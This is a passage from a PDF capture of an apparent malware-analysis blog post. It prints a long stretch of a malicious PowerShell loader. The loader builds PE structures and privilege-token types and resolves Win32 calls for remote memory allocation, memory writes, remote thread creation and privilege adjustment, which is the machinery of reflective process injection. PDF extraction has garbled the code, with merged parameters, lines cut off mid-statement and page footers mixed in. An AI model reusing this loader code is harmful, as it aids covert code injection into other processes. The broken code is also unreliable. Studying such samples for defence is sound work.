-MemberTypeNoteProperty-NameIMAGE_BASE_RELOCATION-\r\nValue$IMAGE_BASE_RELOCATION\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'IMAGE_IMPORT_DESCRIPTOR' ,$Attributes ,[System.ValueType] ,20)\r\n$TypeBuilder .DefineField( 'Characteristics' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'TimeDateStamp' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'ForwarderChain' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'Name' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'FirstThunk' ,[UInt32] ,'Public' )|Out-Null\r\n$IMAGE_IMPORT_DESCRIPTOR   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_IMPORT_DESCRIPTOR-\r\nValue$IMAGE_IMPORT_DESCRIPTOR\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'IMAGE_EXPORT_DIRECTORY' ,$Attributes ,[System.ValueType] ,40)\r\n$TypeBuilder .DefineField( 'Characteristics' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'TimeDateStamp' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'MajorVersion' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'MinorVersion' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'Name' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'Base' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'NumberOfFunctions' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'NumberOfNames' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'AddressOfFunctions' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'AddressOfNames' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'AddressOfNameOrdinals' ,[UInt32] ,'Public' )|Out-Null\r\n$IMAGE_EXPORT_DIRECTORY   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_EXPORT_DIRECTORY-\r\nValue$IMAGE_EXPORT_DIRECTORY\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'LUID' ,$Attributes ,[System.ValueType] ,8)\r\n$TypeBuilder .DefineField( 'LowPart' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'HighPart' ,[UInt32] ,'Public' )|Out-Null\r\n$LUID   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameLUID-Value$LUID\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'LUID_AND_ATTRIBUTES' ,$Attributes ,[System.ValueType] ,12)\r\n$TypeBuilder .DefineField( 'Luid' ,$LUID ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'Attributes' ,[UInt32] ,'Public' )|Out-Null\r\n$LUID_AND_ATTRIBUTES   =$TypeBuilder .CreateType()\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 9 of 57\n\n$Win32Types   |\r\nAdd-Member   -MemberTypeNoteProperty-NameLUID_AND_ATTRIBUTES-\r\nValue$LUID_AND_ATTRIBUTES\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'TOKEN_PRIVILEGES' ,$Attributes ,[System.ValueType] ,16)\r\n$TypeBuilder .DefineField( 'PrivilegeCount' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'Privileges' ,$LUID_AND_ATTRIBUTES ,'Public' )|Out-Null\r\n$TOKEN_PRIVILEGES   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameTOKEN_PRIVILEGES-Value$TOKEN_PRIVILEGES\r\nreturn   $Win32Types\r\n}\r\nFunction   Get-Win32Constants\r\n{\r\n$Win32Constants   =New-Object   System.Object\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameMEM_COMMIT-Value0x00001000\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameMEM_RESERVE-Value0x00002000\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NamePAGE_NOACCESS-Value0x01\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NamePAGE_READONLY-Value0x02\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NamePAGE_READWRITE-Value0x04\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NamePAGE_WRITECOPY-Value0x08\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NamePAGE_EXECUTE-Value0x10\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NamePAGE_EXECUTE_READ-Value0x20\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NamePAGE_EXECUTE_READWRITE-Value0x40\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NamePAGE_EXECUTE_WRITECOPY-Value0x80\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NamePAGE_NOCACHE-Value0x200\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_REL_BASED_ABSOLUTE-Value0\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_REL_BASED_HIGHLOW-Value3\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_REL_BASED_DIR64-Value10\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_SCN_MEM_DISCARDABLE-Value0x02000000\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_SCN_MEM_EXECUTE-Value0x20000000\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_SCN_MEM_READ-Value0x40000000\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_SCN_MEM_WRITE-Value0x80000000\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_SCN_MEM_NOT_CACHED-Value0x04000000\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameMEM_DECOMMIT-Value0x4000\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_FILE_EXECUTABLE_IMAGE-Value0x0002\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_FILE_DLL-Value0x2000\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE-\r\nValue0x40\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_DLLCHARACTERISTICS_NX_COMPAT-\r\nValue0x100\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameMEM_RELEASE-Value0x8000\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 10 of 57\n\n$Win32Constants   |\r\nAdd-Member   -MemberTypeNoteProperty-NameTOKEN_QUERY-Value0x0008\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameTOKEN_ADJUST_PRIVILEGES-Value0x0020\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameSE_PRIVILEGE_ENABLED-Value0x2\r\n$Win32Constants   |Add-Member   -MemberTypeNoteProperty-NameERROR_NO_TOKEN-Value0x3f0\r\nreturn   $Win32Constants\r\n}\r\nFunction   Get-Win32Functions\r\n{\r\n$Win32Functions   =New-Object   System.Object\r\n$VirtualAllocAddr   =Get-ProcAddress   kernel32.dllVirtualAlloc\r\n$VirtualAllocDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[UIntPtr] ,[UInt32] ,[UInt32] )( [IntPtr] )\r\n$VirtualAlloc   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $VirtualAllocAddr ,$VirtualAllocDeleg\r\n$Win32Functions   |Add-Member   NoteProperty-NameVirtualAlloc-Value$VirtualAlloc\r\n$VirtualAllocExAddr   =Get-ProcAddress   kernel32.dllVirtualAllocEx\r\n$VirtualAllocExDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[IntPtr] ,[UIntPtr] ,[UInt32] ,[UInt32] )( [IntPtr] )\r\n$VirtualAllocEx   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $VirtualAllocExAddr ,$VirtualAllocE\r\n$Win32Functions   |Add-Member   NoteProperty-NameVirtualAllocEx-Value$VirtualAllocEx\r\n$memcpyAddr   =Get-ProcAddress   msvcrt.dllmemcpy\r\n$memcpyDelegate   =Get-DelegateType   @( [IntPtr] ,[IntPtr] ,[UIntPtr] )( [IntPtr] )\r\n$memcpy   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $memcpyAddr ,$memcpyDelegate )\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-Namememcpy-Value$memcpy\r\n$memsetAddr   =Get-ProcAddress   msvcrt.dllmemset\r\n$memsetDelegate   =Get-DelegateType   @( [IntPtr] ,[Int32] ,[IntPtr] )( [IntPtr] )\r\n$memset   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $memsetAddr ,$memsetDelegate )\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-Namememset-Value$memset\r\n$LoadLibraryAddr   =Get-ProcAddress   kernel32.dllLoadLibraryA\r\n$LoadLibraryDelegate   =Get-DelegateType   @( [String] )( [IntPtr] )\r\n$LoadLibrary   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $LoadLibraryAddr ,$LoadLibraryDelegate\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameLoadLibrary-Value$LoadLibrary\r\n$GetProcAddressAddr   =Get-ProcAddress   kernel32.dllGetProcAddress\r\n$GetProcAddressDelegate   =Get-DelegateType   @( [IntPtr] ,[String] )( [IntPtr] )\r\n$GetProcAddress   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $GetProcAddressAddr ,$GetProcAddres\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameGetProcAddress-Value$GetProcAddress\r\n$GetProcAddressOrdinalAddr   =Get-ProcAddress   kernel32.dllGetProcAddress\r\n$GetProcAddressOrdinalDelegate   =Get-DelegateType   @( [IntPtr] ,[IntPtr] )( [IntPtr] )\r\n$GetProcAddressOrdinal   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $GetProcAddressOrdinalAddr ,\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameGetProcAddressOrdinal-\r\nValue$GetProcAddressOrdinal\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 11 of 57\n\n$VirtualFreeAddr   =\r\nGet-ProcAddress   kernel32.dllVirtualFree\r\n$VirtualFreeDelegate   =Get-DelegateType   @( [IntPtr] ,[UIntPtr] ,[UInt32] )( [Bool] )\r\n$VirtualFree   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $VirtualFreeAddr ,$VirtualFreeDelegate\r\n$Win32Functions   |Add-Member   NoteProperty-NameVirtualFree-Value$VirtualFree\r\n$VirtualFreeExAddr   =Get-ProcAddress   kernel32.dllVirtualFreeEx\r\n$VirtualFreeExDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[IntPtr] ,[UIntPtr] ,[UInt32] )( [Bool] )\r\n$VirtualFreeEx   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $VirtualFreeExAddr ,$VirtualFreeExDe\r\n$Win32Functions   |Add-Member   NoteProperty-NameVirtualFreeEx-Value$VirtualFreeEx\r\n$VirtualProtectAddr   =Get-ProcAddress   kernel32.dllVirtualProtect\r\n$VirtualProtectDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[UIntPtr] ,[UInt32] ,[UInt32] .MakeByRefType())( [Bool] )\r\n$VirtualProtect   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $VirtualProtectAddr ,$VirtualProtec\r\n$Win32Functions   |Add-Member   NoteProperty-NameVirtualProtect-Value$VirtualProtect\r\n$GetModuleHandleAddr   =Get-ProcAddress   kernel32.dllGetModuleHandleA\r\n$GetModuleHandleDelegate   =Get-DelegateType   @( [String] )( [IntPtr] )\r\n$GetModuleHandle   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $GetModuleHandleAddr ,$GetModuleHa\r\n$Win32Functions   |Add-Member   NoteProperty-NameGetModuleHandle-Value$GetModuleHandle\r\n$FreeLibraryAddr   =Get-ProcAddress   kernel32.dllFreeLibrary\r\n$FreeLibraryDelegate   =Get-DelegateType   @( [IntPtr] )( [Bool] )\r\n$FreeLibrary   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $FreeLibraryAddr ,$FreeLibraryDelegate\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameFreeLibrary-Value$FreeLibrary\r\n$OpenProcessAddr   =Get-ProcAddress   kernel32.dllOpenProcess\r\n$OpenProcessDelegate   =Get-DelegateType   @( [UInt32] ,[Bool] ,[UInt32] )( [IntPtr] )\r\n$OpenProcess   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $OpenProcessAddr ,$OpenProcessDe\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameOpenProcess-Value$OpenProcess\r\n$WaitForSingleObjectAddr   =Get-ProcAddress   kernel32.dllWaitForSingleObject\r\n$WaitForSingleObjectDelegate   =Get-DelegateType   @( [IntPtr] ,[UInt32] )( [UInt32] )\r\n$WaitForSingleObject   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $WaitForSingleObjectAddr ,\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameWaitForSingleObject-\r\nValue$WaitForSingleObject\r\n$WriteProcessMemoryAddr   =Get-ProcAddress   kernel32.dllWriteProcessMemory\r\n$WriteProcessMemoryDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[IntPtr] ,[IntPtr] ,[UIntPtr] ,[UIntPtr] .MakeByRefType())( [Bool] )\r\n$WriteProcessMemory   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $WriteProcessMemoryAddr\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameWriteProcessMemory-\r\nValue$WriteProcessMemory\r\n$ReadProcessMemoryAddr   =Get-ProcAddress   kernel32.dllReadProcessMemory\r\n$ReadProcessMemoryDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[IntPtr] ,[IntPtr] ,[UIntPtr] ,[UIntPtr] .MakeByRefType())( [Bool] )\r\n$ReadProcessMemory   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $ReadProcessMemoryAddr ,\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 12 of 57\n\n$Win32Functions   |\r\nAdd-Member   -MemberTypeNoteProperty-NameReadProcessMemory-\r\nValue$ReadProcessMemory\r\n$CreateRemoteThreadAddr   =Get-ProcAddress   kernel32.dllCreateRemoteThread\r\n$CreateRemoteThreadDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[IntPtr] ,[UIntPtr] ,[IntPtr] ,[IntPtr] ,[UInt32] ,[IntPtr] )( [IntPtr] )\r\n$CreateRemoteThread   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $CreateRemoteThreadAddr\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameCreateRemoteThread-\r\nValue$CreateRemoteThread\r\n$GetExitCodeThreadAddr   =Get-ProcAddress   kernel32.dllGetExitCodeThread\r\n$GetExitCodeThreadDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[Int32] .MakeByRefType())( [Bool] )\r\n$GetExitCodeThread   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $GetExitCodeThreadAddr ,\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameGetExitCodeThread-\r\nValue$GetExitCodeThread\r\n$OpenThreadTokenAddr   =Get-ProcAddress   Advapi32.dllOpenThreadToken\r\n$OpenThreadTokenDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[UInt32] ,[Bool] ,[IntPtr] .MakeByRefType())( [Bool] )\r\n$OpenThreadToken   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $OpenThreadTokenAddr ,$O\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameOpenThreadToken-Value$OpenThreadToken\r\n$GetCurrentThreadAddr   =Get-ProcAddress   kernel32.dllGetCurrentThread\r\n$GetCurrentThreadDelegate   =Get-DelegateType   @()( [IntPtr] )\r\n$GetCurrentThread   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $GetCurrentThreadAddr ,\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameGetCurrentThread-Value$GetCurrentThread\r\n$AdjustTokenPrivilegesAddr   =Get-ProcAddress   Advapi32.dllAdjustTokenPrivileges\r\n$AdjustTokenPrivilegesDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[Bool] ,[IntPtr] ,[UInt32] ,[IntPtr] ,[IntPtr] )( [Bool] )\r\n$AdjustTokenPrivileges   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $AdjustTokenPrivileges\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameAdjustTokenPrivileges-\r\nValue$AdjustTokenPrivileges\r\n$LookupPrivilegeValueAddr   =Get-ProcAddress   Advapi32.dllLookupPrivilegeValueA\r\n$LookupPrivilegeValueDelegate   =Get-DelegateType   @( [String] ,\r\n[String] ,[IntPtr] )( [Bool] )\r\n$LookupPrivilegeValue   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $LookupPrivilegeValueAd\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameLookupPrivilegeValue-\r\nValue$LookupPrivilegeValue\r\n$ImpersonateSelfAddr   =Get-ProcAddress   Advapi32.dllImpersonateSelf\r\n$ImpersonateSelfDelegate   =Get-DelegateType   @( [Int32] )( [Bool] )\r\n$ImpersonateSelf   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $ImpersonateSelfAddr ,$Im\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameImpersonateSelf-Value$ImpersonateSelf\r\nif   (( [Environment] ::OSVersion.Version-ge   ( New-Object   'Version'   6,0))-\r\nand   ( [Environment] ::OSVersion.Version-lt   ( New-Object   'Version'   6,2))){\r\n$NtCreateThreadExAddr   =Get-ProcAddress   NtDll.dllNtCreateThreadEx\r\n$NtCreateThreadExDelegate   =Get-DelegateType   @( [IntPtr] .MakeByRefType(),\r\n[UInt32] ,[IntPtr] ,[IntPtr] ,[IntPtr] ,[IntPtr] ,[Bool] ,[UInt32]\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 13 of 57\n\n$NtCreateThreadEx   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $NtCreateThreadExAddr\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameNtCreateThreadEx-\r\nValue$NtCreateThreadEx\r\n}\r\n$IsWow64ProcessAddr   =Get-ProcAddress   Kernel32.dllIsWow64Process\r\n$IsWow64ProcessDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[Bool] .MakeByRefType())( [Bool] )\r\n$IsWow64Process   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $IsWow64ProcessAddr ,$IsW\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameIsWow64Process-Value$IsWow64Process\r\n$CreateThreadAddr   =Get-ProcAddress   Kernel32.dllCreateThread\r\n$CreateThreadDelegate   =Get-DelegateType   @( [IntPtr] ,\r\n[IntPtr] ,[IntPtr] ,[IntPtr] ,[UInt32] ,[UInt32] .MakeByRefType())( [IntPtr] )\r\n$CreateThread   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $CreateThreadAddr ,$CreateT\r\n$Win32Functions   |Add-Member   -MemberTypeNoteProperty-NameCreateThread-Value$CreateThread\r\n$LocalFreeAddr   =Get-ProcAddress   kernel32.dllVirtualFree\r\n$LocalFreeDelegate   =Get-DelegateType   @( [IntPtr] )\r\n$LocalFree   =[System.Runtime.InteropServices.Marshal] ::GetDelegateForFunctionPointer( $LocalFreeAddr ,$LocalFreeDelegate )\r\n$Win32Functions   |Add-Member   NoteProperty-NameLocalFree-Value$LocalFree\r\nreturn   $Win32Functions\r\n}\r\nFunction   Sub-SignedIntAsUnsigned\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[Int64]\r\n$Value1 ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[Int64]\r\n$Value2\r\n)\r\n[Byte[]] $Value1Bytes   =[BitConverter] ::GetBytes( $Value1 )\r\n[Byte[]] $Value2Bytes   =[BitConverter] ::GetBytes( $Value2 )\r\n[Byte[]] $FinalBytes   =[BitConverter] ::GetBytes( [UInt64] 0)\r\nif   ( $Value1Bytes .Count-eq   $Value2Bytes .Count)\r\n{\r\n$CarryOver   =0\r\nfor   ( $i   =0;$i   -lt   $Value1Bytes .Count;$i ++)\r\n{\r\n$Val   =$Value1Bytes [ $i ]-$CarryOver\r\nif   ( $Val   -lt   $Value2Bytes [ $i ])\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 14 of 57\n\n{\r\n$Val   +=256\r\n$CarryOver   =1\r\n}\r\nelse\r\n{\r\n$CarryOver   =0\r\n}\r\n[UInt16] $Sum   =$Val   -$Value2Bytes [ $i ]\r\n$FinalBytes [ $i ]=$Sum   -band   0x00FF\r\n}\r\n}\r\nelse\r\n{\r\nThrow\"Cannotsubtractbytearraysofdifferentsizes\"\r\n}\r\nreturn   [BitConverter] ::ToInt64( $FinalBytes ,0)\r\n}\r\nFunction   Add-SignedIntAsUnsigned\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[Int64]\r\n$Value1 ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[Int64]\r\n$Value2\r\n)\r\n[Byte[]] $Value1Bytes   =[BitConverter] ::GetBytes( $Value1 )\r\n[Byte[]] $Value2Bytes   =[BitConverter] ::GetBytes( $Value2 )\r\n[Byte[]] $FinalBytes   =[BitConverter] ::GetBytes( [UInt64] 0)\r\nif   ( $Value1Bytes .Count-eq   $Value2Bytes .Count)\r\n{\r\n$CarryOver   =0\r\nfor   ( $i   =0;$i   -lt   $Value1Bytes .Count;$i ++)\r\n{\r\n[UInt16] $Sum   =$Value1Bytes [ $i ]+$Value2Bytes [ $i ]+$CarryOver\r\n$FinalBytes [ $i ]=$Sum   -band   0x00FF\r\nif   (( $Sum   -band   0xFF00)-eq   0x100)\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 15 of 57\n\n{\r\n$CarryOver   =1\r\n}\r\nelse\r\n{\r\n$CarryOver   =0\r\n}\r\n}\r\n}\r\nelse\r\n{\r\nThrow\"Cannotaddbytearraysofdifferentsizes\"\r\n}\r\nreturn   [BitConverter] ::ToInt64( $FinalBytes ,0)\r\n}\r\nFunction   Compare-Val1GreaterThanVal2AsUInt\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[Int64]\r\n$Value1 ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[Int64]\r\n$Value2\r\n)\r\n[Byte[]] $Value1Bytes   =[BitConverter] ::GetBytes( $Value1 )\r\n[Byte[]] $Value2Bytes   =[BitConverter] ::GetBytes( $Value2 )\r\nif   ( $Value1Bytes .Count-eq   $Value2Bytes .Count)\r\n{\r\nfor   ( $i   =$Value1Bytes .Count-1;$i   -ge   0;$i --)\r\n{\r\nif   ( $Value1Bytes [ $i ]-gt   $Value2Bytes [ $i ])\r\n{\r\nreturn   $true\r\n}\r\nelseif   ( $Value1Bytes [ $i ]-lt   $Value2Bytes [ $i ])\r\n{\r\nreturn   $false\r\n}\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 16 of 57\n\n}\r\n}\r\nelse\r\n{\r\nThrow\"Cannotcomparebytearraysofdifferentsize\"\r\n}\r\nreturn   $false\r\n}\r\nFunction   Convert-UIntToInt\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[UInt64]\r\n$Value\r\n)\r\n[Byte[]] $ValueBytes   =[BitConverter] ::GetBytes( $Value )\r\nreturn   ( [BitConverter] ::ToInt64( $ValueBytes ,0))\r\n}\r\nFunction   Test-MemoryRangeValid\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[String]\r\n$DebugString ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[System.Object]\r\n$PEInfo ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\n[IntPtr]\r\n$StartAddress ,\r\n[ Parameter ( ParameterSetName   =\"Size\" ,Position   =3,Mandatory   =$true )]\r\n[IntPtr]\r\n$Size\r\n)\r\n[IntPtr] $FinalEndAddress   =[IntPtr] ( Add-SignedIntAsUnsigned   ( $StartAddress )( $Size ))\r\n$PEEndAddress   =$PEInfo .EndAddress\r\nif   (( Compare-Val1GreaterThanVal2AsUInt   ( $PEInfo .PEHandle)( $StartAddress ))-eq   $true )\r\n{\r\nThrow\"Tryingtowritetomemorysmallerthanallocatedaddressrange.$DebugString\"\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 17 of 57\n\n}\r\nif   (( Compare-Val1GreaterThanVal2AsUInt   ( $FinalEndAddress )( $PEEndAddress ))-eq   $true )\r\n{\r\nThrow\"Tryingtowritetomemorygreaterthanallocatedaddressrange.$DebugString\"\r\n}\r\n}\r\nFunction   Write-BytesToMemory\r\n{\r\nParam (\r\n[ Parameter ( Position =0,Mandatory   =$true )]\r\n[Byte[]]\r\n$Bytes ,\r\n[ Parameter ( Position =1,Mandatory   =$true )]\r\n[IntPtr]\r\n$MemoryAddress\r\n)\r\nfor   ( $Offset   =0;$Offset   -lt   $Bytes .Length;$Offset ++)\r\n{\r\n[System.Runtime.InteropServices.Marshal] ::WriteByte( $MemoryAddress ,$Offset ,$Bytes [ $Offset ])\r\n}\r\n}\r\nFunction   Get-DelegateType\r\n{\r\nParam\r\n(\r\n[OutputType( [Type] )]\r\n[ Parameter (Position   =0)]\r\n[Type[]]\r\n$Parameters   =( New-Object   Type[](0)),\r\n[ Parameter (Position   =1)]\r\n[Type]\r\n$ReturnType   =[Void]\r\n)\r\n$Domain   =[AppDomain] ::CurrentDomain\r\n$DynAssembly   =New-Object   System.Reflection.AssemblyName( 'ReflectedDelegate' )\r\n$AssemblyBuilder   =$Domain .DefineDynamicAssembly( $DynAssembly ,[System.Reflection.Emit.AssemblyBuilderAccess] ::Run)\r\n$ModuleBuilder   =$AssemblyBuilder .DefineDynamicModule( 'InMemoryModule' ,$false )\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'MyDelegateType' ,'Class,Public,Sealed,AnsiClass,AutoClass' ,[System.Mu\r\n$ConstructorBuilder   =$TypeBuilder .DefineConstructor( 'RTSpecialName,HideBySig,Public' ,[System.Reflection.CallingConv\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 18 of 57\n\n$ConstructorBuilder .SetImplementationFlags( 'Runtime,Managed' )\r\n$MethodBuilder   =$TypeBuilder .DefineMethod( 'Invoke' ,'Public,HideBySig,NewSlot,Virtual' ,$ReturnType ,$Parame\r\n$MethodBuilder .SetImplementationFlags( 'Runtime,Managed' )\r\nWrite-Output   $TypeBuilder .CreateType()\r\n}\r\nFunction   Get-ProcAddress\r\n{\r\nParam\r\n(\r\n[OutputType( [IntPtr] )]\r\n[ Parameter (Position   =0,Mandatory   =$True   )]\r\n[String]\r\n$Module ,\r\n[ Parameter (Position   =1,Mandatory   =$True   )]\r\n[String]\r\n$Procedure\r\n)\r\n$SystemAssembly   =[AppDomain] ::CurrentDomain.GetAssemblies()|\r\nWhere-Object   {$_ .GlobalAssemblyCache-And   $_ .Location.Split( '\\\\' )\r\n[-1].Equals( 'System.dll' )}\r\n$UnsafeNativeMethods   =$SystemAssembly .GetType( 'Microsoft.Win32.UnsafeNativeMethods' )\r\n$GetModuleHandle   =$UnsafeNativeMethods .GetMethod( 'GetModuleHandle' )\r\n$GetProcAddress   =$UnsafeNativeMethods .GetMethod( 'GetProcAddress' )\r\n$Kern32Handle   =$GetModuleHandle .Invoke( $null ,@( $Module ))\r\n$tmpPtr   =New-Object   IntPtr\r\n$HandleRef   =New-Object   